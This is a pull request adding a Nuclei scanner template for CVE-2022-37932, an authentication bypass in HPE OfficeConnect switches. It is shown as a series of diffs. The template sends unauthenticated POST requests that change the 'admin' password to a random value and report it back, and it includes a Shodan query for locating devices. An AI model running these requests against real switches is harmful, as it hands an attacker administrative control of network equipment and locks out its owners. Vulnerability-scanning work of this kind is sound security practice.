### PR TITLE
Added/CVE-2022-37932

### DIFF
--- a/network/cves/2022/CVE-2022-37932.yaml
+++ b/network/cves/2022/CVE-2022-37932.yaml
@@ -26,7 +26,7 @@ http:
       - type: word
         part: body
         words:
-          - '"redirect": "/htdocs/login/login.lsp"'
+          - '"redirect": "/login/login.lsp"'
           - '"error": ""'
         condition: and
 
@@ -43,7 +43,7 @@ http:
 
   - raw:
       - |
-        POST /login/default_password_cfg.lua HTTP/1.1
+        POST /htdocs/login/default_password_cfg.lua HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 

--- a/network/cves/2022/CVE-2022-37932.yaml
+++ b/network/cves/2022/CVE-2022-37932.yaml
@@ -1,43 +1,53 @@
 id: CVE-2022-37932
 
 info:
-  name: Default Password Configuration Vulnerability
+  name: HP Switch  - Authentication Bypass
   author: Phulelouch
   severity: high
   description: |
-    The application allows unauthenticated password changes through the default_password_cfg.lua endpoint,
-    potentially allowing attackers to take over accounts with default or empty passwords.
-    A successful password change returns a JSON response redirecting to the login page with an empty error field.
-  impact: |
-    An attacker can change the password of accounts with default or empty passwords,
-    leading to unauthorized access and account takeover.
-  remediation: |
-    - Disable the default password configuration endpoint
-    - Require authentication for password changes
-    - Enforce strong default passwords
-    - Implement proper access controls
+    A security vulnerability allowing remote authentication bypass has been identified in HPE OfficeConnect 1820, 1850, and 1920S network switches. HPE has addressed the issue by releasing updated firmware versions. Devices running firmware versions prior to PT.02.14, PC.01.22, PO.01.21, and PD.02.22 are affected.
   reference:
-    - https://example.com/advisory
-  classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
-    cvss-score: 9.8
-    cwe-id: CWE-521
-  metadata:
-    verified: false
-    max-request: 2
-    note: Tests both /htdocs/login and /login paths. Success indicated by redirect to login.lsp with empty error field
-  tags: auth,default-password,config,takeover
+    - https://github.com/Tim-Hoekstra/CVE-2022-37932
+  tags: cve,cve2022,auth,default-password,config,takeover
+
+flow: http(1) || http(2)
 
 http:
-  - method: POST
-    path:
-      - "{{BaseURL}}/htdocs/login/default_password_cfg.lua"
-      - "{{BaseURL}}/login/default_password_cfg.lua"
+  - raw:
+      - |
+        POST /login/default_password_cfg.lua HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
 
-    headers:
-      Content-Type: application/x-www-form-urlencoded
+        username=admin&oldPwd=&newPwd={{randstr}}&confirmPwd={{randstr}}
 
-    body: "username=admin&oldPwd=&newPwd=Phulelouch1337&confirmPwd=Phulelouch1337"
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"redirect": "/htdocs/login/login.lsp"'
+          - '"error": ""'
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: json
+        part: body
+        json:
+          - .redirect
+          - .error
+
+  - raw:
+      - |
+        POST /login/default_password_cfg.lua HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username=admin&oldPwd=&newPwd={{randstr}}&confirmPwd={{randstr}}
 
     matchers-condition: and
     matchers:

--- a/network/cves/2022/CVE-2022-37932.yaml
+++ b/network/cves/2022/CVE-2022-37932.yaml
@@ -1,0 +1,60 @@
+id: CVE-2022-37932
+
+info:
+  name: Default Password Configuration Vulnerability
+  author: Phulelouch
+  severity: high
+  description: |
+    The application allows unauthenticated password changes through the default_password_cfg.lua endpoint,
+    potentially allowing attackers to take over accounts with default or empty passwords.
+    A successful password change returns a JSON response redirecting to the login page with an empty error field.
+  impact: |
+    An attacker can change the password of accounts with default or empty passwords,
+    leading to unauthorized access and account takeover.
+  remediation: |
+    - Disable the default password configuration endpoint
+    - Require authentication for password changes
+    - Enforce strong default passwords
+    - Implement proper access controls
+  reference:
+    - https://example.com/advisory
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cwe-id: CWE-521
+  metadata:
+    verified: false
+    max-request: 2
+    note: Tests both /htdocs/login and /login paths. Success indicated by redirect to login.lsp with empty error field
+  tags: auth,default-password,config,takeover
+
+http:
+  - method: POST
+    path:
+      - "{{BaseURL}}/htdocs/login/default_password_cfg.lua"
+      - "{{BaseURL}}/login/default_password_cfg.lua"
+
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+
+    body: "username=admin&oldPwd=&newPwd=Phulelouch1337&confirmPwd=Phulelouch1337"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"redirect": "/htdocs/login/login.lsp"'
+          - '"error": ""'
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: json
+        part: body
+        json:
+          - .redirect
+          - .error

--- a/network/cves/2022/CVE-2022-37932.yaml
+++ b/network/cves/2022/CVE-2022-37932.yaml
@@ -1,13 +1,13 @@
 id: CVE-2022-37932
-
 info:
-  name: HP Switch  - Authentication Bypass
+  name: HP Switch - Authentication Bypass
   author: Phulelouch
   severity: high
   description: |
     A security vulnerability allowing remote authentication bypass has been identified in HPE OfficeConnect 1820, 1850, and 1920S network switches. HPE has addressed the issue by releasing updated firmware versions. Devices running firmware versions prior to PT.02.14, PC.01.22, PO.01.21, and PD.02.22 are affected.
   reference:
     - https://github.com/Tim-Hoekstra/CVE-2022-37932
+    - https://github.com/phulelouch/nuclei-templates/edit/Added/CVE-2022-37932
   tags: cve,cve2022,auth,default-password,config,takeover
 
 flow: http(1) || http(2)
@@ -18,7 +18,7 @@ http:
         POST /login/default_password_cfg.lua HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
-
+        
         username=admin&oldPwd=&newPwd={{randstr}}&confirmPwd={{randstr}}
 
     matchers-condition: and
@@ -29,11 +29,9 @@ http:
           - '"redirect": "/login/login.lsp"'
           - '"error": ""'
         condition: and
-
       - type: status
         status:
           - 200
-
     extractors:
       - type: json
         part: body
@@ -46,7 +44,7 @@ http:
         POST /htdocs/login/default_password_cfg.lua HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
-
+        
         username=admin&oldPwd=&newPwd={{randstr}}&confirmPwd={{randstr}}
 
     matchers-condition: and
@@ -57,11 +55,9 @@ http:
           - '"redirect": "/htdocs/login/login.lsp"'
           - '"error": ""'
         condition: and
-
       - type: status
         status:
           - 200
-
     extractors:
       - type: json
         part: body

--- a/network/cves/2022/CVE-2022-37932.yaml
+++ b/network/cves/2022/CVE-2022-37932.yaml
@@ -3,7 +3,7 @@ id: CVE-2022-37932
 info:
   name: HP Switch - Authentication Bypass
   author: Phulelouch
-  severity: critical
+  severity: high
   description: |
     A potential security vulnerability has been identified in Hewlett Packard Enterprise OfficeConnect 1820, 1850, and 1920S Network switches. The vulnerability could be remotely exploited to allow authentication bypass. HPE has made the following software updates to resolve the vulnerability in Hewlett Packard Enterprise OfficeConnect 1820, 1850 and 1920S Network switches versions- Prior to PT.02.14; Prior to PC.01.22; Prior to PO.01.21; Prior to PD.02.22;
   classification:

--- a/network/cves/2022/CVE-2022-37932.yaml
+++ b/network/cves/2022/CVE-2022-37932.yaml
@@ -1,4 +1,5 @@
 id: CVE-2022-37932
+
 info:
   name: HP Switch - Authentication Bypass
   author: Phulelouch
@@ -8,59 +9,94 @@ info:
   reference:
     - https://github.com/Tim-Hoekstra/CVE-2022-37932
     - https://github.com/phulelouch/nuclei-templates/edit/Added/CVE-2022-37932
-  tags: cve,cve2022,auth,default-password,config,takeover
+  classification:
+    cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2022-37932
+    epss-score: 0.00075
+    epss-percentile: 0.23495
+    cpe: cpe:2.3:o:hpe:officeconnect_1820_j9979a_firmware:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 3
+    shodan-query: html:"HPE OfficeConnect"
+    vendor: hpe
+    product: officeconnect_1820_j9979a_firmware
+  tags: cve,cve2022,hp,ato,takeover,intrusive
 
-flow: http(1) || http(2)
+variables:
+  password: "{{rand_base(8)}}"
+
+flow: http(1) && http(2) || http(3)
 
 http:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+    redirects: true
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code == 200"
+          - "contains(body, '<title>HPE OfficeConnect Switch 1920')"
+        condition: and
+        internal: true
+
   - raw:
       - |
         POST /login/default_password_cfg.lua HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
-        
-        username=admin&oldPwd=&newPwd={{randstr}}&confirmPwd={{randstr}}
 
-    matchers-condition: and
+        username=admin&oldPwd=&newPwd={{password}}&confirmPwd={{password}}
+
     matchers:
-      - type: word
-        part: body
-        words:
-          - '"redirect": "/login/login.lsp"'
-          - '"error": ""'
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "redirect")'
+          - 'contains(content_type, "application/json")'
         condition: and
-      - type: status
-        status:
-          - 200
+
     extractors:
       - type: json
+        name: redirect
         part: body
         json:
           - .redirect
-          - .error
+        internal: true
 
+      - type: dsl
+        dsl:
+          - '"Password:"+ password'
+          - '"Login Path:"+ redirect'
   - raw:
       - |
         POST /htdocs/login/default_password_cfg.lua HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
-        
-        username=admin&oldPwd=&newPwd={{randstr}}&confirmPwd={{randstr}}
 
-    matchers-condition: and
+        username=admin&oldPwd=&newPwd={{password}}&confirmPwd={{password}}
+
     matchers:
-      - type: word
-        part: body
-        words:
-          - '"redirect": "/htdocs/login/login.lsp"'
-          - '"error": ""'
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "redirect")'
+          - 'contains(content_type, "application/json")'
         condition: and
-      - type: status
-        status:
-          - 200
+
     extractors:
       - type: json
+        name: redirect
         part: body
         json:
           - .redirect
-          - .error
+        internal: true
+
+      - type: dsl
+        dsl:
+          - '"Password:"+ password'
+          - '"Login Path:"+ redirect'

--- a/network/cves/2022/CVE-2022-37932.yaml
+++ b/network/cves/2022/CVE-2022-37932.yaml
@@ -5,10 +5,7 @@ info:
   author: Phulelouch
   severity: high
   description: |
-    A security vulnerability allowing remote authentication bypass has been identified in HPE OfficeConnect 1820, 1850, and 1920S network switches. HPE has addressed the issue by releasing updated firmware versions. Devices running firmware versions prior to PT.02.14, PC.01.22, PO.01.21, and PD.02.22 are affected.
-  reference:
-    - https://github.com/Tim-Hoekstra/CVE-2022-37932
-    - https://github.com/phulelouch/nuclei-templates/edit/Added/CVE-2022-37932
+    A potential security vulnerability has been identified in Hewlett Packard Enterprise OfficeConnect 1820, 1850, and 1920S Network switches. The vulnerability could be remotely exploited to allow authentication bypass. HPE has made the following software updates to resolve the vulnerability in Hewlett Packard Enterprise OfficeConnect 1820, 1850 and 1920S Network switches versions- Prior to PT.02.14; Prior to PC.01.22; Prior to PO.01.21; Prior to PD.02.22;
   classification:
     cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 8.8
@@ -19,10 +16,10 @@ info:
   metadata:
     verified: true
     max-request: 3
-    shodan-query: html:"HPE OfficeConnect"
     vendor: hpe
     product: officeconnect_1820_j9979a_firmware
-  tags: cve,cve2022,hp,ato,takeover,intrusive
+    shodan-query: html:"HPE OfficeConnect"
+  tags: cve,cve2022,hp,officeconnect,auth-bypass,intrusive
 
 variables:
   password: "{{rand_base(8)}}"

--- a/network/cves/2022/CVE-2022-37932.yaml
+++ b/network/cves/2022/CVE-2022-37932.yaml
@@ -3,7 +3,7 @@ id: CVE-2022-37932
 info:
   name: HP Switch - Authentication Bypass
   author: Phulelouch
-  severity: high
+  severity: critical
   description: |
     A potential security vulnerability has been identified in Hewlett Packard Enterprise OfficeConnect 1820, 1850, and 1920S Network switches. The vulnerability could be remotely exploited to allow authentication bypass. HPE has made the following software updates to resolve the vulnerability in Hewlett Packard Enterprise OfficeConnect 1820, 1850 and 1920S Network switches versions- Prior to PT.02.14; Prior to PC.01.22; Prior to PO.01.21; Prior to PD.02.22;
   classification:


### PR DESCRIPTION
Added/CVE-2022-37932 Template

### Template / PR Information

HPE OfficeConnect network switches contain a critical authentication bypass vulnerability that allows unauthenticated attackers to gain administrative access to affected devices. The vulnerability, tracked as CVE-2022-37932, exists in the password reset functionality of the web management interface, where insufficient validation allows attackers to change the administrator password without authentication.

- Added CVE-2022-37932
- References:

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

https://nvd.nist.gov/vuln/detail/CVE-2022-37932

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)